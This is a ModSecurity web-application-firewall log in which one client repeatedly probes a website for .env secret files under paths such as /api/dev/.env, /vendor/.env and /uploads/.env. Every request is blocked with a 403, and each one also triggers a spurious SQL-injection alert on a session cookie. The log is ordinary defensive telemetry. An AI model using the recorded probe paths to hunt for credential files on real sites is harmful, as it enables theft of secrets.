[Mon May 11 16:33:37.782997 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/v3/.env"] [unique_id "agHowUWKUxpmnkK7zHx_aQAAAQs"]
[Mon May 11 16:33:37.783238 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/v3/.env"] [unique_id "agHowUWKUxpmnkK7zHx_aQAAAQs"]
[Mon May 11 16:33:37.939211 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/dev/.env"] [unique_id "agHowUWKUxpmnkK7zHx_awAAAQs"]
[Mon May 11 16:33:37.939556 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/dev/.env"] [unique_id "agHowUWKUxpmnkK7zHx_awAAAQs"]
[Mon May 11 16:33:37.939737 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/dev/.env"] [unique_id "agHowUWKUxpmnkK7zHx_awAAAQs"]
[Mon May 11 16:33:37.939947 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/dev/.env"] [unique_id "agHowUWKUxpmnkK7zHx_awAAAQs"]
[Mon May 11 16:33:38.428595 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/staging/.env"] [unique_id "agHowlV4kyjgo4bQBUhXngAAAM0"]
[Mon May 11 16:33:38.429011 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/staging/.env"] [unique_id "agHowlV4kyjgo4bQBUhXngAAAM0"]
[Mon May 11 16:33:38.429266 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/staging/.env"] [unique_id "agHowlV4kyjgo4bQBUhXngAAAM0"]
[Mon May 11 16:33:38.429546 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/staging/.env"] [unique_id "agHowlV4kyjgo4bQBUhXngAAAM0"]
[Mon May 11 16:33:38.593507 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/vendor/.env"] [unique_id "agHowlV4kyjgo4bQBUhXnwAAAM0"]
[Mon May 11 16:33:38.593893 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/vendor/.env"] [unique_id "agHowlV4kyjgo4bQBUhXnwAAAM0"]
[Mon May 11 16:33:38.594079 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/vendor/.env"] [unique_id "agHowlV4kyjgo4bQBUhXnwAAAM0"]
[Mon May 11 16:33:38.594329 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/vendor/.env"] [unique_id "agHowlV4kyjgo4bQBUhXnwAAAM0"]
[Mon May 11 16:33:38.758626 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/lib/.env"] [unique_id "agHowlV4kyjgo4bQBUhXoAAAAM0"]
[Mon May 11 16:33:38.759000 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/lib/.env"] [unique_id "agHowlV4kyjgo4bQBUhXoAAAAM0"]
[Mon May 11 16:33:38.759207 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/lib/.env"] [unique_id "agHowlV4kyjgo4bQBUhXoAAAAM0"]
[Mon May 11 16:33:38.759435 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/lib/.env"] [unique_id "agHowlV4kyjgo4bQBUhXoAAAAM0"]
[Mon May 11 16:33:38.922843 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/resources/.env"] [unique_id "agHowlV4kyjgo4bQBUhXoQAAAM0"]
[Mon May 11 16:33:38.923240 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/resources/.env"] [unique_id "agHowlV4kyjgo4bQBUhXoQAAAM0"]
[Mon May 11 16:33:38.923428 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/resources/.env"] [unique_id "agHowlV4kyjgo4bQBUhXoQAAAM0"]
[Mon May 11 16:33:38.923671 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/resources/.env"] [unique_id "agHowlV4kyjgo4bQBUhXoQAAAM0"]
[Mon May 11 16:33:39.086583 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/assets/.env"] [unique_id "agHow1V4kyjgo4bQBUhXogAAAM0"]
[Mon May 11 16:33:39.086968 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/assets/.env"] [unique_id "agHow1V4kyjgo4bQBUhXogAAAM0"]
[Mon May 11 16:33:39.087167 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/assets/.env"] [unique_id "agHow1V4kyjgo4bQBUhXogAAAM0"]
[Mon May 11 16:33:39.087427 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/assets/.env"] [unique_id "agHow1V4kyjgo4bQBUhXogAAAM0"]
[Mon May 11 16:33:39.250323 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/uploads/.env"] [unique_id "agHow1V4kyjgo4bQBUhXowAAAM0"]
[Mon May 11 16:33:39.250713 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/uploads/.env"] [unique_id "agHow1V4kyjgo4bQBUhXowAAAM0"]
[Mon May 11 16:33:39.250898 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/uploads/.env"] [unique_id "agHow1V4kyjgo4bQBUhXowAAAM0"]
[Mon May 11 16:33:39.251165 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/uploads/.env"] [unique_id "agHow1V4kyjgo4bQBUhXowAAAM0"]
[Mon May 11 16:33:39.415263 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/internal/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpAAAAM0"]
[Mon May 11 16:33:39.415644 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/internal/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpAAAAM0"]
[Mon May 11 16:33:39.415829 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/internal/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpAAAAM0"]
[Mon May 11 16:33:39.416142 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/internal/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpAAAAM0"]
[Mon May 11 16:33:39.579635 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/tools/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpgAAAM0"]
[Mon May 11 16:33:39.580014 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/tools/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpgAAAM0"]
